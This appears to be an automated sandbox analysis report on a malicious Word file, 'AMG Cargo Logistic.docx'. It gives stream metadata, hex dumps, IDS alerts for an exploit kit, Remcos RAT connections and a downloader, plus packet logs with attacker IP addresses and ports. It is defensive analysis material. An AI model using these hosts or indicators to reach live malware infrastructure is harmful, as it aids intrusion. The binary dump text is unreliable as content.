                                                                                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                OLE File "AMG Cargo Logistic.docx"

                                                                                                                                                                                                Indicators
                                                                                                                                                                                                Has Summary Info:
                                                                                                                                                                                                Application Name:
                                                                                                                                                                                                Encrypted Document:False
                                                                                                                                                                                                Contains Word Document Stream:True
                                                                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                                                                                Flash Objects Count:0
                                                                                                                                                                                                Contains VBA Macros:False
                                                                                                                                                                                                Summary
                                                                                                                                                                                                Code Page:1252
                                                                                                                                                                                                Title:
                                                                                                                                                                                                Subject:
                                                                                                                                                                                                Author:91974
                                                                                                                                                                                                Keywords:
                                                                                                                                                                                                Template:Normal.dotm
                                                                                                                                                                                                Last Saved By:91974
                                                                                                                                                                                                Revion Number:4
                                                                                                                                                                                                Total Edit Time:1
                                                                                                                                                                                                Last Printed:2013-03-25 17:07:30
                                                                                                                                                                                                Create Time:2024-09-30T08:11:00Z
                                                                                                                                                                                                Last Saved Time:2024-09-30T08:12:00Z
                                                                                                                                                                                                Number of Pages:1
                                                                                                                                                                                                Number of Words:0
                                                                                                                                                                                                Number of Characters:0
                                                                                                                                                                                                Thumbnail:u22!v!A vv(vbmmlmlkLLLtttIIIPPPgggKKKCCCRRRMMMaaaLLLBBByyyzzzlllDDDEEEmmm>>>LLLGGGDDDooo===xxxxxxkkkCCCFFFbbb~~~===KKKFFFYYYAAA<<<xxxxxxeee;;;yyy555DDD>>>???KKK333xxx|txxxyyyUUUPPP\\\XXXSSSTTTxxx98"ipnxxxxxx[SD'0#xxxxxx45!xxxxxx\UEHQFxxxxxx7<%xxxxxxxxxxxxxxxxxxxxx{{{rpmpkgwvuywvxutkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihljilkjkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihkihnkjzzzxxxxxxxxx{vy~yxxxgggutuikmhfejjkUTUxxwnmnabdkii^^`ihiyww]]]jii]]_ihicbd^]]NNNbaawxyaaausrwwxmmm\\]ihhzxxssstrq\\]ihh{yyrrrzxw^^`;:;\\\tssqqq|zy{{}```TTTNLMcbcmmmyyyutsgggtsthjlgdcbcdmjjONPcceedekhhZYZkjjaacedepnnkkm```PPPPNN`aamkjrrrsts``bfefkhhZYZlllxxx;9#NVQ58"w~}xxx# ABF469B@@/02{yxQRTyxyzxwLLNC@?UWYzyz{{|QQT??A WXZ~~||~SQPxwyyxwZWVy{}(&&9<?,.2:76sstjhh&')MJIwxz# opqLMOnmmwvwWUSIIJomm #VSRfgi?<=xxx16"4.mxtxxxDBAKMOQNNrtw^[Zyvu\]`fcbvtr789ifewus/01-// UVW866PPQ%#"<<>B@?~KIHBDG300@@A89<**-(&&<98,,.ba`xvu-++!"%CCFxxx98"nvktod17#xxx422;<>#!!JLN568igf@@CJHHOLKprt\YX}zx?>=```\YWJLNgecBDFKKKXXXqooz{}?ACIJM;98323%$&yz|00164478:$""ACF))+<=?**-'%%A><igfpnm'%$ijj}{{124!""%DDGxxx33 }xxx HJL# rsudfh1..IGGhjmLLO:87SPOVWZ -./**,Y[]965dehIJLB@?^^aggi/--wy{[[^ljh>@CROM .,*/02}|VVW%"!>?@daaddf310*+-@?@xxxB=,FNExxxmoq#"$utt579)'&446nnm(()446OPP&$$333AAAecb223OOP/---./ppnAAB_\[hhi99;___0/1PPQ1//,-.rqq??@nlj--.PPQ1//+,-srr==>ywv224srr>>?sqphikBA@rqr,))mmoCBBpqq-++egi"!#yww247&#"}}~997||~433MNOHHH***"!"LLMEBBKKMIII1/0GGJ]\[\\\B@?tsrRRTHHHHIJJJJ'&&%$$EEEeccxxx}pFG1lujxxxxxxxxxxxxxxx{{{spmojewvuusrzzz{{{DDE)),GGGxxxxxxDCC569IHH#$&FEExwxvuutttxxxwvv|{|RRSxwxxxxxxx@B3om[RYNxxxYY[!!#PMMILNDEH ZZ[KJI>=?poo>>A#!"XXYJIHbbd''([XWqrt\[\[[[42330/%&)jjk1.-468nor,,/<;:cehWX[kjhtuv_^^)((>?A357#! ddf`aa<<;LKL423]^^srqDDF:88\[[pnmRQOTTVb_^YXX'%&125.-,TTUONN667QPP;<=xxx78!kmqxxx;<?uwx,++cbbJKMfcbJKNWTSYWUnnnWTSbdf~|zVWZ$%((%%qrt]YXTUXtuxC@?nor !$-*)&')mmmonnxxx17"xxxllotqp^\[`bc.,,a^]^`aoor:87hedNOSZWVIFEgghKHG]_aGHJ]^a#$' !pmkkln><;wxxVUU(%%310?=<tuy,))jihVYY%##YYZLJJRRSUSSxxxlhXWYJacRxxxomlQSVeeg:88aad88:#! LKL866RSU "kihmmnooo'%'gghTRP?>?xxxwts_acNNQLMOVY[;<?!~}~~klnlln:9:QPP78;WUTmmn^[[dehY[](&'lll+)+qppXYZB@@HIK**,BA@xxx/.:>>xxxoVWYyxy_`bZ\^nlk'(+noqxxxXUCTWJxxxt!!!c``;<>:87'')QNN%%&a^^>?A!XVV78:TUW533ZZ[PQS112WTTSSVxxxxxxV[zyzonoqqs~}~ono~~jikywxyxw~~kklxxxxxxu{{{}}}neutrtrprcsqnplhVk|||[Uxxxxxx{}xxxX[WxxxjU879YXXsrsFEE444ZYXIJLWTT544989ONMA@@<<>ca_WY[EDBdcfppp[[\}~656YYZ;9:>>?zxvLMPMJIZ[\ECDxxx`^I(-"xxxn[Z[DA@ddey{}336><<88:|}aac}434!fdcA>=_adxxx:=)dcM.3#xxxA?>*)(wvv&%(LLKDA@YXXnnp@ACVVV{}xxx52"lssn#xxxobPQS_]]JHGwwySSULKK((*ZY[mmoHIKWWY! rtvxxx).87(+0(xxxsqhecTQO*''ffhtssbcdMJI`adxxx]WJ?B&%xxxlYjkm[[[>?@URR245JJIAABECCA>=cef532532llnNMM>?@RPOOPR222xxxxxx{V}Do7[-X*Z%T+`-b7tG^u}pxxxxxxU`-E1~y}|{y{~{|(09J&fD|d]A=|||gK8gCtWi%@(~}#& ~$"~}!!z} {~ -+tsqrol(~!")<P#a6t?o:o;`/O$:/#~zx#" ~!!|#"" # !$$%$"%LEf\trpqmi\C}" $~|}{#x $~!~~|}" #!"~""!""#%~v|||!#$!#" $!}#%!!} ~ ~~ !wbpxxxxxxP0 """ z~$ |~vz}w|~%"`fUSxxxWWEnn[xxx}} %~|~ ! ~}#L8szkA-| IGvn<>@0.-'&'vvv//0()+ZVU((*oml013=:9014976nor%$$\\^YXXaaa/-,ZZ[))+ZYXaacIFF778CCEmoq+*+**,A?>vvvECC !YXWddeECCCEG0--MOQ?==yyz)*+URQlnp))*mkjOQS***ttsBAB{zz^`c+**z{}.--FFHllkFFGzyy79;<98568CB@ACE210wxx)((DFH/,,xxx6:#xxx<|~!uz~z}"!{o^ob~|0VT57:iff569$"!mkjbcf.+*ijl457645TUY|z{uvy?=<MOQ:88zwumorIJMstw^[Z./22//z{}/03$! wy{9;>IHItrqJLNPQSxxx/4"xxxb }{x~}#|n|!%lACFbaa332wut632('*PON^[Z>@B ddf%##(''ZZY)''y{|(&% \ZZ_abigfVXZCAA}zxGFFYYXsuxEDE:::USQecbHIL<>ATUUHJM&&'NLLxxxZUE=A([c_xxx6~"~!~~|!,#~! !w|[e=?BEDCife 743TUVCBCGHJ655557:76))+RSUlji124NPSFDD~{yOPR
                                                                                                                                                                                                Creating Application:Microsoft Office Word
                                                                                                                                                                                                Security:0
                                                                                                                                                                                                Document Summary
                                                                                                                                                                                                Document Code Page:1252
                                                                                                                                                                                                Number of Lines:1
                                                                                                                                                                                                Number of Paragraphs:1
                                                                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                                                                Company:Grizli777
                                                                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                                                                Shared Document:false
                                                                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                                                                Application Version:12.0000

                                                                                                                                                                                                Streams

                                                                                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:114
                                                                                                                                                                                                Entropy:4.25248375192737
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Stream Path: \x1Ole, File Type: data, Stream Size: 20
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x1Ole
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:20
                                                                                                                                                                                                Entropy:0.5689955935892812
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Stream Path: \x3EPRINT, File Type: Windows Enhanced Metafile (EMF) image data version 0x10000, Stream Size: 1301576
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x3EPRINT
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                Stream Size:1301576
                                                                                                                                                                                                Entropy:4.041786466342239
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E M F . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 d6 1f 00 00 b1 1b 00 00 00 00 00 00 00 00 00 00 e7 86 00 00 08 c5 00 00 20 45 4d 46 00 00 01 00 48 dc 13 00 a3 09 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                                                                                                                                                                                                Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x3ObjInfo
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:6
                                                                                                                                                                                                Entropy:1.2516291673878228
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . .
                                                                                                                                                                                                Data Raw:00 00 03 00 0d 00
                                                                                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:244
                                                                                                                                                                                                Entropy:2.701136490257069
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                                                                                Stream Path: \x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\373\363\356\367\362\360\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 90976
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\373\363\356\367\362\360\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                                                                                Stream Size:90976
                                                                                                                                                                                                Entropy:3.617492259697482
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . . v
                                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                                                Stream Path: MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:MBD0018D4CE/\x1Ole
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:20
                                                                                                                                                                                                Entropy:0.5689955935892812
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Stream Path: MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:4
                                                                                                                                                                                                Entropy:0.8112781244591328
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . .
                                                                                                                                                                                                Data Raw:00 00 03 00
                                                                                                                                                                                                Stream Path: MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:MBD0018D4CE/Contents
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                                                                                Stream Size:197671
                                                                                                                                                                                                Entropy:6.989042939766534
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 125121
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:Workbook
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                Stream Size:125121
                                                                                                                                                                                                Entropy:7.253073671715414
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2024-09-30T16:24:36.445590+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1191.134.96.17780192.168.2.2249173TCP
                                                                                                                                                                                                2024-09-30T16:24:36.445590+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1191.134.96.17780192.168.2.2249173TCP
                                                                                                                                                                                                2024-09-30T16:24:37.947876+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917445.90.89.986845TCP
                                                                                                                                                                                                2024-09-30T16:24:39.279885+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249176178.237.33.5080TCP
                                                                                                                                                                                                2024-09-30T16:24:39.497208+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917545.90.89.986845TCP

                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Sep 30, 2024 16:24:07.833563089 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:07.833607912 CEST44349163172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:07.833743095 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:07.839624882 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:07.839636087 CEST44349163172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:08.484910011 CEST44349163172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:08.485112906 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:08.490425110 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:08.490437031 CEST44349163172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:08.490901947 CEST44349163172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:08.491060972 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:08.577837944 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:08.623414040 CEST44349163172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:09.371325970 CEST44349163172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:09.371468067 CEST44349163172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:09.371470928 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:09.371511936 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:09.381414890 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:09.381433964 CEST44349163172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:09.381445885 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:09.381484032 CEST49163443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:10.541908026 CEST49164443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:10.541958094 CEST44349164104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:10.542018890 CEST49164443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:10.542360067 CEST49164443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:10.542373896 CEST44349164104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:11.022574902 CEST44349164104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:11.022648096 CEST49164443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:11.026921034 CEST49164443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:11.026931047 CEST44349164104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:11.027240038 CEST44349164104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:11.033389091 CEST49164443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:11.079391956 CEST44349164104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:11.831207037 CEST44349164104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:11.831283092 CEST44349164104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:11.831487894 CEST49164443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:11.831706047 CEST49164443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:11.831724882 CEST44349164104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:15.225881100 CEST49165443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:15.225922108 CEST44349165172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:15.225975037 CEST49165443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:15.226567030 CEST49165443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:15.226584911 CEST44349165172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:15.968035936 CEST44349165172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:15.968122959 CEST49165443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:15.977278948 CEST49165443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:15.977307081 CEST44349165172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:15.977673054 CEST44349165172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:15.992444038 CEST49165443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:16.039403915 CEST44349165172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:17.178206921 CEST44349165172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:17.178301096 CEST44349165172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:17.178415060 CEST49165443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:17.230315924 CEST49165443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:17.230350018 CEST44349165172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:17.571749926 CEST49166443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:17.571800947 CEST44349166104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:17.571863890 CEST49166443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:17.572181940 CEST49166443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:17.572196960 CEST44349166104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:18.038249016 CEST44349166104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:18.038337946 CEST49166443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:18.043808937 CEST49166443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:18.043822050 CEST44349166104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:18.044148922 CEST44349166104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:18.094722986 CEST49166443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:18.139416933 CEST44349166104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:18.891654968 CEST44349166104.21.78.54192.168.2.22
